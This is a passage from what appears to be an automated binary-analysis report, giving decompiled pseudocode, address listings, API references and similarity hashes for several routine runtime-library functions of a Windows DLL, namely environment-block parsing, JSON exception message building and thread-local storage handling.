				intOrPtr* _t120;
				signed short* _t122;
				intOrPtr* _t124;
				void* _t127;
				intOrPtr _t128;
				signed short* _t129;
				signed short* _t131;
				intOrPtr _t132;
				intOrPtr* _t133;
				void* _t137;
				void* _t139;
				void* _t140;

				_push(_t79);
				_t74 = _a4;
				_t110 = 0;
				_t124 = _t74;
				_t33 =  *_t74;
				while(_t33 != 0) {
					if(_t33 != 0x3d) {
						_t110 = _t110 + 1;
					}
					_t80 = _t124;
					_t115 = _t80 + 1;
					do {
						_t34 =  *_t80;
						_t80 = _t80 + 1;
					} while (_t34 != 0);
					_t124 = _t124 + 1 + _t80 - _t115;
					_t33 =  *_t124;
				}
				_t3 = _t110 + 1; // 0x1
				_t116 = E6E1B10AA(_t3, 4);
				if(_t116 == 0) {
					L19:
					_t116 = 0;
					goto L20;
				} else {
					_v8 = _t116;
					while(1) {
						_t111 =  *_t74;
						if(_t111 == 0) {
							break;
						}
						_t85 = _t74;
						_t127 = _t85 + 1;
						do {
							_t39 =  *_t85;
							_t85 = _t85 + 1;
						} while (_t39 != 0);
						_t40 = _t85 - _t127 + 1;
						_v12 = _t40;
						if(_t111 == 0x3d) {
							L15:
							_t74 = _t74 + _t40;
							continue;
						} else {
							_t128 = E6E1B10AA(_t40, 1);
							if(_t128 == 0) {
								_push(_t116);
								L44();
								E6E1B110D(0);
								goto L19;
							} else {
								_t43 = E6E1AF502(_t128, _v12, _t74);
								_t139 = _t139 + 0xc;
								if(_t43 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E6E1AD97D();
									asm("int3");
									_t137 = _t139;
									_t140 = _t139 - 0xc;
									_push(_t74);
									_t76 = _v40;
									_v52 = 0;
									_t112 = 0;
									_push(_t128);
									_push(_t116);
									_t47 =  *_t76 & 0x0000ffff;
									_t129 = _t76;
									if(_t47 != 0) {
										_t105 = _t47;
										_t78 = 0x3d;
										do {
											if(_t105 != _t78) {
												_t112 = _t112 + 1;
											}
											_t106 = _t129;
											_t14 =  &(_t106[1]); // 0x2
											_t122 = _t14;
											do {
												_t68 =  *_t106;
												_t106 =  &(_t106[1]);
											} while (_t68 != _v12);
											_t129 =  &(( &(_t129[_t106 - _t122 >> 1]))[1]);
											_t69 =  *_t129 & 0x0000ffff;
											_t105 = _t69;
										} while (_t69 != 0);
										_t76 = _v0;
									}
									_t19 = _t112 + 1; // 0x1
									_t118 = E6E1B10AA(_t19, 4);
									if(_t118 == 0) {
										L42:
										E6E1B110D(0);
										return _t118;
									} else {
										_t53 =  *_t76 & 0x0000ffff;
										_v16 = _t118;
										if(_t53 != 0) {
											_t113 = _t53;
											do {
												_t94 = _t76;
												_t21 =  &(_t94[1]); // 0x2
												_t131 = _t21;
												do {
													_t54 =  *_t94;
													_t94 =  &(_t94[1]);
												} while (_t54 != _v12);
												_t96 = _t94 - _t131 >> 1;
												_t23 = _t96 + 1; // -1
												_t55 = _t23;
												_t97 = 0x3d;
												_v20 = _t55;
												if(_t113 == _t97) {
													goto L39;
												} else {
													_t132 = E6E1B10AA(_t55, 2);
													if(_t132 == 0) {
														_push(_t118);
														L44();
														_t118 = 0;
														E6E1B110D(0);
														goto L42;
													} else {
														_t59 = E6E1B90AF(_t132, _v20, _t76);
														_t140 = _t140 + 0xc;
														if(_t59 != 0) {
															_push(0);
															_push(0);
															_push(0);
															_push(0);
															_push(0);
															_t61 = E6E1AD97D();
															asm("int3");
															_push(_t137);
															_push(_t132);
															_t133 = _v88;
															if(_t133 != 0) {
																_t62 =  *_t133;
																_push(_t118);
																_t120 = _t133;
																while(_t62 != 0) {
																	E6E1B110D(_t62);
																	_t120 = _t120 + 4;
																	_t62 =  *_t120;
																}
																_t61 = E6E1B110D(_t133);
															}
															return _t61;
														} else {
															_t64 = _v16;
															 *_t64 = _t132;
															_v16 = _t64 + 4;
															E6E1B110D(0);
															_t55 = _v20;
															goto L39;
														}
													}
												}
												goto L50;
												L39:
												_t76 =  &(_t76[_t55]);
												_t56 =  *_t76 & 0x0000ffff;
												_t113 = _t56;
											} while (_t56 != 0);
										}
										goto L42;
									}
								} else {
									_t70 = _v8;
									 *_t70 = _t128;
									_v8 = _t70 + 4;
									E6E1B110D(0);
									_t40 = _v12;
									goto L15;
								}
							}
						}
						goto L50;
					}
					L20:
					E6E1B110D(0);
					return _t116;
				}
				L50:
			}

0x6e1ae943
0x6e1ae945
0x6e1ae948
0x6e1ae94c
0x6e1ae94e
0x6e1ae96a
0x6e1ae954
0x6e1ae956
0x6e1ae956
0x6e1ae957
0x6e1ae959
0x6e1ae95c
0x6e1ae95c
0x6e1ae95e
0x6e1ae95f
0x6e1ae966
0x6e1ae968
0x6e1ae968
0x6e1ae96e
0x6e1ae979
0x6e1ae97f
0x6e1ae9ef
0x6e1ae9ef
0x00000000
0x6e1ae981
0x6e1ae981
0x6e1ae9d8
0x6e1ae9d8
0x6e1ae9dc
0x00000000
0x00000000
0x6e1ae986
0x6e1ae988
0x6e1ae98b
0x6e1ae98b
0x6e1ae98d
0x6e1ae98e
0x6e1ae994
0x6e1ae997
0x6e1ae99d
0x6e1ae9d6
0x6e1ae9d6
0x00000000
0x6e1ae99f
0x6e1ae9a7
0x6e1ae9ad
0x6e1ae9e0
0x6e1ae9e1
0x6e1ae9e8
0x00000000
0x6e1ae9af
0x6e1ae9b4
0x6e1ae9b9
0x6e1ae9be
0x6e1aea02
0x6e1aea03
0x6e1aea04
0x6e1aea05
0x6e1aea06
0x6e1aea07
0x6e1aea0c
0x6e1aea10
0x6e1aea12
0x6e1aea15
0x6e1aea16
0x6e1aea1b
0x6e1aea1e
0x6e1aea20
0x6e1aea21
0x6e1aea22
0x6e1aea25
0x6e1aea2a
0x6e1aea2e
0x6e1aea30
0x6e1aea31
0x6e1aea34
0x6e1aea36
0x6e1aea36
0x6e1aea37
0x6e1aea39
0x6e1aea39
0x6e1aea3c
0x6e1aea3c
0x6e1aea3f
0x6e1aea42
0x6e1aea4f
0x6e1aea52
0x6e1aea55
0x6e1aea57
0x6e1aea5c
0x6e1aea5c
0x6e1aea5f
0x6e1aea6a
0x6e1aea70
0x6e1aeafd
0x6e1aeb00
0x6e1aeb0c
0x6e1aea76
0x6e1aea76
0x6e1aea79
0x6e1aea7f
0x6e1aea81
0x6e1aea83
0x6e1aea83
0x6e1aea85
0x6e1aea85
0x6e1aea88
0x6e1aea88
0x6e1aea8b
0x6e1aea8e
0x6e1aea96
0x6e1aea9a
0x6e1aea9a
0x6e1aea9d
0x6e1aea9e
0x6e1aeaa4
0x00000000
0x6e1aeaa6
0x6e1aeaae
0x6e1aeab4
0x6e1aeaed
0x6e1aeaee
0x6e1aeaf3
0x6e1aeaf6
0x00000000
0x6e1aeab6
0x6e1aeabb
0x6e1aeac0
0x6e1aeac5
0x6e1aeb0f
0x6e1aeb10
0x6e1aeb11
0x6e1aeb12
0x6e1aeb13
0x6e1aeb14
0x6e1aeb19
0x6e1aeb1c
0x6e1aeb1f
0x6e1aeb20
0x6e1aeb25
0x6e1aeb27
0x6e1aeb29
0x6e1aeb2a
0x6e1aeb3a
0x6e1aeb2f
0x6e1aeb34
0x6e1aeb37
0x6e1aeb39
0x6e1aeb3f
0x6e1aeb45
0x6e1aeb48
0x6e1aeac7
0x6e1aeac7
0x6e1aeaca
0x6e1aeacf
0x6e1aead5
0x6e1aeada
0x00000000
0x6e1aeadd
0x6e1aeac5
0x6e1aeab4
0x00000000
0x6e1aeade
0x6e1aeade
0x6e1aeae1
0x6e1aeae4
0x6e1aeae6
0x6e1aeaeb
0x00000000
0x6e1aea7f
0x6e1ae9c0
0x6e1ae9c0
0x6e1ae9c5
0x6e1ae9ca
0x6e1ae9cd
0x6e1ae9d2
0x00000000
0x6e1ae9d5
0x6e1ae9be
0x6e1ae9ad
0x00000000
0x6e1ae99d
0x6e1ae9f1
0x6e1ae9f3
0x6e1ae9ff
0x6e1ae9ff
0x00000000

APIs

_free.LIBCMT ref: 6E1AE9CD
_free.LIBCMT ref: 6E1AE9E8
_free.LIBCMT ref: 6E1AE9F3
_free.LIBCMT ref: 6E1AEB00

Part of subcall function 6E1B10AA: HeapAlloc.KERNEL32(00000008,?,00000000,?,6E1B4310,00000001,00000364,00000009,000000FF,?,6E19B62D,A1724430,A172442E,?,?), ref: 6E1B10EB

_free.LIBCMT ref: 6E1AEAD5

Part of subcall function 6E1B110D: HeapFree.KERNEL32(00000000,00000000,?,6E1C0F1D,?,00000000,?,A1724430,?,6E1C1221,?,00000007,?,?,6E1BC966,?), ref: 6E1B1123
Part of subcall function 6E1B110D: GetLastError.KERNEL32(?,?,6E1C0F1D,?,00000000,?,A1724430,?,6E1C1221,?,00000007,?,?,6E1BC966,?,?), ref: 6E1B1135

_free.LIBCMT ref: 6E1AEAF6

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Heap$AllocErrorFreeLast
String ID:
API String ID: 2104767428-0
Opcode ID: 45c475c37898e99a47bfb6e86a7f8aface4122802088e89fee9bf9af6a343d33
Instruction ID: b9feda308536772ab59ac6c5665fbbc86be97c1c62b9cac1b4a91b16a486991f
Opcode Fuzzy Hash: 45c475c37898e99a47bfb6e86a7f8aface4122802088e89fee9bf9af6a343d33
Instruction Fuzzy Hash: B3517D7EB042119BDB14DFFC88506FA77A9EF84354F210459EA41DB284EB329FC6E650

Uniqueness

Uniqueness Score: -1.00%

Function 6E1925A0, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 343
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6E1925A0(void* __ebx, signed int __ecx, signed int __edx, void* __edi) {
				intOrPtr _v8;
				signed int _v16;
				char _v24;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v80;
				char _v83;
				intOrPtr _v84;
				char _v104;
				signed int _v108;
				signed int _v112;
				char _v128;
				char _v132;
				signed int _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v152;
				void* __esi;
				signed int _t123;
				signed int _t124;
				signed int _t131;
				char* _t149;
				char* _t155;
				intOrPtr _t158;
				signed int _t162;
				intOrPtr _t166;
				intOrPtr _t170;
				void* _t176;
				signed int _t181;
				signed int _t182;
				intOrPtr _t183;
				signed int _t191;
				void* _t193;
				signed int _t196;
				signed int _t201;
				signed int _t202;
				signed int _t205;
				intOrPtr _t211;
				signed int _t212;
				intOrPtr _t213;
				intOrPtr _t214;
				signed int _t215;
				signed int _t222;
				intOrPtr _t223;
				signed int _t226;
				intOrPtr _t227;
				signed int _t228;
				signed int _t229;
				void* _t230;
				void* _t231;
				void* _t232;
				void* _t233;
				signed char _t236;
				signed int _t238;
				char* _t243;
				signed int _t244;
				signed int _t246;
				signed int _t249;
				void* _t254;
				signed int _t257;
				void* _t258;

				_push(__ebx);
				_t193 = _t254;
				_t257 = (_t254 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t193 + 4));
				_t252 = _t257;
				_push(0xffffffff);
				_push(E6E202B65);
				_push( *[fs:0x0]);
				_push(_t193);
				_t258 = _t257 - 0x78;
				_t123 =  *0x6e212008; // 0xa172442e
				_t124 = _t123 ^ _t257;
				_v32 = _t124;
				_push(__edi);
				_push(_t124);
				 *[fs:0x0] =  &_v24;
				_t238 = __edx;
				_v132 = __edx;
				_v144 = __ecx;
				_v136 = __ecx;
				_v136 = __ecx;
				_t243 =  &_v83;
				_t196 =  *(_t193 + 8);
				if(_t196 >= 0) {
					do {
						_t243 = _t243 - 1;
						_t222 = 0xcccccccd * _t196 >> 0x20 >> 3;
						_t131 =  *(_t193 + 8) - (_t222 << 2) + _t222 + (_t222 << 2) + _t222;
						 *(_t193 + 8) = _t131;
						 *_t243 = _t131 + 0x30;
						_t196 = _t222;
						 *(_t193 + 8) = _t196;
						__eflags = _t196;
					} while (__eflags != 0);
				} else {
					_t215 =  ~_t196;
					 *(_t193 + 8) = _t215;
					do {
						_t243 = _t243 - 1;
						_t236 = 0xcccccccd * _t215 >> 0x20 >> 3;
						_t191 =  *(_t193 + 8) - (_t236 << 2) + _t236 + (_t236 << 2) + _t236;
						 *(_t193 + 8) = _t191;
						 *(_t193 + 8) = _t236;
						 *_t243 = _t191 + 0x30;
						_t215 = _t236;
					} while (_t215 != 0);
					_t243 = _t243 - 1;
					 *_t243 = 0x2d;
				}
				_t132 =  &_v83;
				_v112 = 0;
				_v108 = 0xf;
				_v128 = 0;
				if(_t243 !=  &_v83) {
					_t196 =  &_v128;
					E6E193E20(_t193, _t196, _t252, _t243, _t132 - _t243);
				}
				_v16 = 0;
				_t223 =  *((intOrPtr*)(_t238 + 0x10));
				_v140 = _t223;
				if(0x7fffffff - _t223 < 0x10) {
					E6E191350(_t193, _t196, _t223, _t238, _t243, _t252);
					goto L46;
				} else {
					if( *((intOrPtr*)(_t238 + 0x14)) >= 0x10) {
						_v132 =  *_t238;
					}
					_t201 = _t223 + 0x10;
					_v40 = 0;
					_t246 = 0xf;
					_v36 = 0;
					_v136 = _t201;
					_t238 =  &_v56;
					if(_t201 <= 0xf) {
						L22:
						asm("movups xmm0, [0x6e20ba58]");
						_t53 = _t238 + 0x10; // 0x10
						_v40 = _t201;
						_v36 = _t246;
						asm("movups [edi], xmm0");
						E6E1A42C0(_t53, _v132, _t223);
						_t258 = _t258 + 0xc;
						 *((char*)(_t238 + _v140 + 0x10)) = 0;
						_v16 = 1;
						_t202 = _v40;
						if(_v36 - _t202 < 1) {
							_push(1);
							_v132 = 0;
							_t149 = E6E195FD0(_t193,  &_v56, _t238, _t246, _t252, 1, _v132, ".");
						} else {
							_t62 = _t202 + 1; // 0x1
							_v40 = _t62;
							_t179 =  >=  ? _v56 :  &_v56;
							 *((short*)(( >=  ? _v56 :  &_v56) + _t202)) = 0x2e;
							_t149 =  &_v56;
						}
						asm("movups xmm0, [eax]");
						asm("movups [ebp-0x5c], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ebp-0x4c], xmm0");
						 *(_t149 + 0x10) = 0;
						 *(_t149 + 0x14) = 0xf;
						 *_t149 = 0;
						_v16 = 2;
						_push( &_v128);
						_push( &_v104);
						_push(_v144);
						E6E196C50(_t193,  &_v80, _t238, _t246);
						_v16 = 3;
						_t205 = _v64;
						if(_v60 - _t205 < 2) {
							_push(2);
							_v132 = 0;
							_t155 = E6E195FD0(_t193,  &_v80, _t238, _t246, _t252, 2, _v132, "] ");
						} else {
							_v64 = _t205 + 2;
							_t176 =  >=  ? _v80 :  &_v80;
							 *((short*)(_t176 + _t205)) = 0x205d;
							 *((char*)(_t176 + _t205 + 2)) = 0;
							_t155 =  &_v80;
						}
						_t243 = _v144;
						 *(_t243 + 0x10) = 0;
						 *(_t243 + 0x14) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [esi], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [esi+0x10], xmm0");
						 *(_t155 + 0x10) = 0;
						 *(_t155 + 0x14) = 0xf;
						 *_t155 = 0;
						_t226 = _v60;
						if(_t226 < 0x10) {
							L32:
							_t227 = _v84;
							_v64 = 0;
							_v60 = 0xf;
							_v80 = 0;
							if(_t227 < 0x10) {
								L36:
								_t228 = _v36;
								if(_t228 < 0x10) {
									L40:
									_t229 = _v108;
									_v40 = 0;
									_v36 = 0xf;
									_v56 = 0;
									if(_t229 < 0x10) {
										L44:
										 *[fs:0x0] = _v24;
										return E6E199EE7(_v32 ^ _t252);
									} else {
										_t211 = _v128;
										_t230 = _t229 + 1;
										_t158 = _t211;
										if(_t230 < 0x1000) {
											L43:
											_push(_t230);
											E6E19A3FB(_t211);
											goto L44;
										} else {
											_t196 =  *(_t211 - 4);
											_t223 = _t230 + 0x23;
											if(_t158 - _t196 + 0xfffffffc > 0x1f) {
												goto L47;
											} else {
												goto L43;
											}
										}
									}
								} else {
									_t212 = _v56;
									_t231 = _t228 + 1;
									_t162 = _t212;
									if(_t231 < 0x1000) {
										L39:
										_push(_t231);
										E6E19A3FB(_t212);
										_t258 = _t258 + 8;
										goto L40;
									} else {
										_t196 =  *(_t212 - 4);
										_t223 = _t231 + 0x23;
										if(_t162 - _t196 + 0xfffffffc > 0x1f) {
											goto L47;
										} else {
											goto L39;
										}
									}
								}
							} else {
								_t213 = _v104;
								_t232 = _t227 + 1;
								_t166 = _t213;
								if(_t232 < 0x1000) {
									L35:
									_push(_t232);
									E6E19A3FB(_t213);
									_t258 = _t258 + 8;
									goto L36;
								} else {
									_t196 =  *(_t213 - 4);
									_t223 = _t232 + 0x23;
									if(_t166 - _t196 + 0xfffffffc > 0x1f) {
										goto L47;
									} else {
										goto L35;
									}
								}
							}
						} else {
							_t214 = _v80;
							_t233 = _t226 + 1;
							_t170 = _t214;
							if(_t233 < 0x1000) {
								L31:
								_push(_t233);
								E6E19A3FB(_t214);
								_t258 = _t258 + 8;
								goto L32;
							} else {
								_t196 =  *(_t214 - 4);
								_t223 = _t233 + 0x23;
								if(_t170 - _t196 + 0xfffffffc > 0x1f) {
									goto L47;
								} else {
									goto L31;
								}
							}
						}
					} else {
						_t249 = _t201 | 0x0000000f;
						_t271 = _t249 - 0x7fffffff;
						if(_t249 <= 0x7fffffff) {
							__eflags = _t249 - 0x16;
							_t246 =  <  ? 0x16 : _t249;
							_t47 = _t246 + 1; // 0x1
							_t181 = _t47;
							__eflags = _t181 - 0x1000;
							if(_t181 < 0x1000) {
								__eflags = _t181;
								if(__eflags == 0) {
									_t238 = 0;
									__eflags = 0;
								} else {
									_push(_t181);
									_t182 = E6E199EF8(__eflags);
									_t201 = _v136;
									_t258 = _t258 + 4;
									_t223 = _v140;
									_t238 = _t182;
								}
								goto L21;
							} else {
								_t48 = _t181 + 0x23; // 0x24
								_t196 = _t48;
								__eflags = _t196 - _t181;
								if(__eflags <= 0) {
									L46:
									E6E191260();
									goto L47;
								} else {
									goto L13;
								}
							}
						} else {
							_t243 = 0x7fffffff;
							_t196 = 0x80000023;
							L13:
							_push(_t196);
							_t183 = E6E199EF8(_t271);
							_t258 = _t258 + 4;
							if(_t183 == 0) {
								L47:
								E6E1AD960(_t193, _t196, _t223, _t238, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t243);
								_t244 = _t196;
								 *((intOrPtr*)(_t244 + 0x10)) = 0x6e204274;
								E6E19B666(_t244 + 0x14);
								 *_t244 = 0x6e204274;
								E6E19B666(_t244 + 4);
								__eflags = _v152 & 0x00000001;
								if((_v152 & 0x00000001) != 0) {
									_push(0x1c);
									E6E19A3FB(_t244);
								}
								return _t244;
							} else {
								_t201 = _v136;
								_t44 = _t183 + 0x23; // 0x23
								_t223 = _v140;
								_t238 = _t44 & 0xffffffe0;
								 *((intOrPtr*)(_t238 - 4)) = _t183;
								L21:
								_v56 = _t238;
								goto L22;
							}
						}
					}
				}
			}

0x6e1925a0
0x6e1925a1
0x6e1925a9
0x6e1925b0
0x6e1925b4
0x6e1925b6
0x6e1925b8
0x6e1925c3
0x6e1925c4
0x6e1925c5
0x6e1925c8
0x6e1925cd
0x6e1925cf
0x6e1925d3
0x6e1925d4
0x6e1925d8
0x6e1925de
0x6e1925e0
0x6e1925e3
0x6e1925e9
0x6e1925ec
0x6e1925ef
0x6e1925f2
0x6e1925f7
0x6e192633
0x6e192638
0x6e19263b
0x6e19264b
0x6e19264f
0x6e192655
0x6e192657
0x6e192659
0x6e19265c
0x6e19265c
0x6e1925f9
0x6e1925f9
0x6e1925fb
0x6e192600
0x6e192605
0x6e192608
0x6e192618
0x6e19261c
0x6e192622
0x6e192625
0x6e192627
0x6e192629
0x6e19262d
0x6e19262e
0x6e19262e
0x6e192660
0x6e192663
0x6e19266a
0x6e192671
0x6e192677
0x6e19267b
0x6e192680
0x6e192680
0x6e192685
0x6e192691
0x6e192696
0x6e19269c
0x6e19297e
0x00000000
0x6e1926a2
0x6e1926a6
0x6e1926aa
0x6e1926aa
0x6e1926ad
0x6e1926b0
0x6e1926b7
0x6e1926bc
0x6e1926c3
0x6e1926c6
0x6e1926cb
0x6e192743
0x6e192743
0x6e19274e
0x6e192751
0x6e192754
0x6e192758
0x6e19275b
0x6e192763
0x6e192766
0x6e19276b
0x6e192774
0x6e19277c
0x6e192799
0x6e1927a0
0x6e1927ac
0x6e19277e
0x6e19277e
0x6e192784
0x6e19278a
0x6e19278e
0x6e192794
0x6e192794
0x6e1927b1
0x6e1927b4
0x6e1927b8
0x6e1927bd
0x6e1927c2
0x6e1927c9
0x6e1927d0
0x6e1927d6
0x6e1927da
0x6e1927de
0x6e1927df
0x6e1927e8
0x6e1927ed
0x6e1927f6
0x6e1927fe
0x6e192823
0x6e19282a
0x6e192836
0x6e192800
0x6e192806
0x6e192811
0x6e192815
0x6e192819
0x6e19281e
0x6e19281e
0x6e19283b
0x6e192841
0x6e192848
0x6e19284f
0x6e192852
0x6e192855
0x6e19285a
0x6e19285f
0x6e192866
0x6e19286d
0x6e192870
0x6e192876
0x6e1928a4
0x6e1928a4
0x6e1928a7
0x6e1928ae
0x6e1928b5
0x6e1928bc
0x6e1928ea
0x6e1928ea
0x6e1928f0
0x6e19291a
0x6e19291a
0x6e19291d
0x6e192924
0x6e19292b
0x6e192932
0x6e19295c
0x6e192961
0x6e19297b
0x6e192934
0x6e192934
0x6e192937
0x6e192938
0x6e192940
0x6e192952
0x6e192952
0x6e192954
0x00000000
0x6e192942
0x6e192942
0x6e192945
0x6e192950
0x00000000
0x00000000
0x00000000
0x00000000
0x6e192950
0x6e192940
0x6e1928f2
0x6e1928f2
0x6e1928f5
0x6e1928f6
0x6e1928fe
0x6e192910
0x6e192910
0x6e192912
0x6e192917
0x00000000
0x6e192900
0x6e192900
0x6e192903
0x6e19290e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19290e
0x6e1928fe
0x6e1928be
0x6e1928be
0x6e1928c1
0x6e1928c2
0x6e1928ca
0x6e1928e0
0x6e1928e0
0x6e1928e2
0x6e1928e7
0x00000000
0x6e1928cc
0x6e1928cc
0x6e1928cf
0x6e1928da
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1928da
0x6e1928ca
0x6e192878
0x6e192878
0x6e19287b
0x6e19287c
0x6e192884
0x6e19289a
0x6e19289a
0x6e19289c
0x6e1928a1
0x00000000
0x6e192886
0x6e192886
0x6e192889
0x6e192894
0x00000000
0x00000000
0x00000000
0x00000000
0x6e192894
0x6e192884
0x6e1926cd
0x6e1926cf
0x6e1926d2
0x6e1926d8
0x6e19270b
0x6e19270d
0x6e192710
0x6e192710
0x6e192713
0x6e192718
0x6e192727
0x6e192729
0x6e19273e
0x6e19273e
0x6e19272b
0x6e19272b
0x6e19272c
0x6e192731
0x6e192734
0x6e192737
0x6e19273a
0x6e19273a
0x00000000
0x6e19271a
0x6e19271a
0x6e19271a
0x6e19271d
0x6e19271f
0x6e192983
0x6e192983
0x00000000
0x6e192725
0x00000000
0x6e192725
0x6e19271f
0x6e1926da
0x6e1926da
0x6e1926df
0x6e1926e4
0x6e1926e4
0x6e1926e5
0x6e1926ea
0x6e1926ef
0x6e192988
0x6e192988
0x6e19298d
0x6e19298e
0x6e19298f
0x6e192990
0x6e192991
0x6e192996
0x6e19299e
0x6e1929a6
0x6e1929ad
0x6e1929b5
0x6e1929ba
0x6e1929bc
0x6e1929bf
0x6e1929c4
0x6e1929ca
0x6e1926f5
0x6e1926f5
0x6e1926f8
0x6e1926fb
0x6e1926fe
0x6e192701
0x6e192740
0x6e192740
0x00000000
0x6e192740
0x6e1926ef
0x6e1926d8
0x6e1926cb

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 6E19299E
___std_exception_destroy.LIBVCRUNTIME ref: 6E1929AD

Strings

[json.exception., xrefs: 6E192743
tB n, xrefs: 6E192996
, n, xrefs: 6E1925D2

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_destroy
String ID: , n$[json.exception.$tB n
API String ID: 4194217158-4020754320
Opcode ID: f8169011d5407aa7cbeffdb7bd5478dfca57fce0206e4355b043f33cef8d9ca4
Instruction ID: 2f5507ed784fae611c4eda03e689cc3e38e87bf873140e723e839c4307dd65fa
Opcode Fuzzy Hash: f8169011d5407aa7cbeffdb7bd5478dfca57fce0206e4355b043f33cef8d9ca4
Instruction Fuzzy Hash: 0AD1E371E002098FEB18CFA8D890BDDBBB5EF55304F20861DD425AB391D774AAC5EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19BF2D, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E19BF2D(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6e212020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6E1A3A83(_t13, __eflags,  *0x6e212020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E1A3ABE(_t14, __eflags,  *0x6e212020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6E1AF55C();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E1A3ABE(_t18, __eflags,  *0x6e212020, 0);
								} else {
									_t8 = E6E1A3ABE(_t18, __eflags,  *0x6e212020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6E1AF428(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6e19bf2d
0x6e19bf34
0x6e19bf47
0x6e19bf4e
0x6e19bf50
0x6e19bf51
0x6e19bf54
0x6e19bf6d
0x6e19bf6d
0x6e19bf56
0x6e19bf56
0x6e19bf58
0x6e19bf62
0x6e19bf69
0x6e19bf6b
0x6e19bf72
0x6e19bf7b
0x6e19bf7e
0x6e19bf7f
0x6e19bf81
0x6e19bf95
0x6e19bf95
0x6e19bf9e
0x6e19bf83
0x6e19bf8a
0x6e19bf90
0x6e19bf91
0x6e19bf93
0x6e19bfa7
0x6e19bfa9
0x6e19bfa9
0x00000000
0x00000000
0x00000000
0x6e19bf93
0x6e19bfac
0x00000000
0x00000000
0x00000000
0x6e19bf6b
0x6e19bf58
0x6e19bfb4
0x6e19bfbe
0x6e19bf36
0x6e19bf38
0x6e19bf38

APIs

GetLastError.KERNEL32(00000001,?,6E19BB82,6E19A172,6E19A467,?,6E19A69F,?,00000001,?,?,00000001,?,6E2101E0,0000000C,6E19A7A1), ref: 6E19BF3B
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E19BF49
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E19BF62
SetLastError.KERNEL32(00000000,6E19A69F,?,00000001,?,?,00000001,?,6E2101E0,0000000C,6E19A7A1,?,00000001,?), ref: 6E19BFB4

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7c9cca9120c2ee3427ff657315e7c03044a2f17bcafb3adce3035f30de6452da
Instruction ID: 6ee2e53f60e75b3a91eaab4cefe5eb9bc48f5794f84e374883921aa9d019bed6
Opcode Fuzzy Hash: 7c9cca9120c2ee3427ff657315e7c03044a2f17bcafb3adce3035f30de6452da
Instruction Fuzzy Hash: C001493711C7215DD60599F96C8CEEA366BE727238330032EF620820E4EF504C81F654

Uniqueness

Uniqueness Score: -1.00%

Function 6E192C10, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E192C10(void* __ebx, intOrPtr* __ecx, void* __edi, char _a4) {
				char _v8;
				char _v16;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v37;
				char _v38;
				short _v40;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v72;
				intOrPtr _v76;
				void* _v96;
				char _v100;
				char _v104;
				char _v112;
				char _v124;
				char _v128;
				signed int _t49;
				signed int _t50;
				short _t52;
				char _t53;
				void* _t54;
				intOrPtr* _t61;
				intOrPtr _t70;
				intOrPtr _t75;
				intOrPtr* _t89;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t98;
				void* _t99;
